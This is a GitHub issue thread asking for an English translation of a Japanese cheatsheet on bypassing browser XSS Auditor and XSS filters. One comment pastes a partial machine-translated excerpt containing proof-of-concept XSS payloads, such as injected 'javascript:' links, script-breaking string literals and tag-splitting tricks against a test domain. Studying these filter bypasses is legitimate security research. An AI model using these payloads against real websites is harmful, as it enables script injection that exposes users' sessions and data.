-
Notifications
You must be signed in to change notification settings - Fork 210
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
English version? #2
Comments
Hi @qazbnm456! I am thinking that I want to provide English version, but I couldn't make time so far :( Hi @Auxy233! Please feel free to translate my cheatsheet. It's up to you, but if you can send me the English version (via the pull request?), I'll merge it and add proper credit. Thanks! |
Thank you for your consideration and help, @masatokinugawa and @Auxy233. I'm looking forward to it. 😄 |
@Auxy233 Nice, I can't wait to see it. Really appreciate. 👍 |
@Auxy233 Sorry for bothering again, but is there any progress I can follow up? Still awaiting your kind work patiently. |
Any progress? |
Just use Google Translate for the time being. @masatokinugawa does a good job at describing the conditions and I was easily able to reproduce the bypasses. |
here is an google translated markdown for yall, who needs it : This page summarizes XSS Auditor and XSS filter bypass. Content that runs on the latest versions of Chrome/Safari and IE11/Edge is eligible. Table of contents
XSS AuditorWhat is not blockedIn contexts where protection is not provided in the first place, scripts can be executed without special manipulation. XSS happening in string literalshttps://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)// <script>var q="";alert(1)//"</script> XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)https://vulnerabledoma.in/bypass/link?q=javascript:alert(1) <a href="javascript:alert(1)">Link</a> If you have more than one injection point(Although it appears to be able to screen out a significant number of cases occurring with more than one, previously reported cases ( [#96616](https://bugs.chromium.org/p/chromium/issues/detail?id =96616) #403636 ) is WontFix, so it is classified as not to be blocked.) https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60 <div>`-alert(1)</script><script>`</div>
<div>`-alert(1)</script><script>`</div> If there is string manipulationWhen some strings are removed or replaced, intervening strings do not block. If deletedhttps://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E <svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)> if replacedhttps://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E <script>/&/-alert(1)</script>
↓
<script>/&/-alert(1)</script> DOM based XSS other than
|
@w1redch4d I don't think that adding it as a comment to an issue is really helpful. But thanks for the effort anyway. I hope that it will help those that don't know what Google Translate is and how to use it. |
Hi @masatokinugawa, thanks for your sharing. It's pretty neat! However, I just want to know do you have any plan offering the English version as well? It would be great if we can have one. 😄
The text was updated successfully, but these errors were encountered: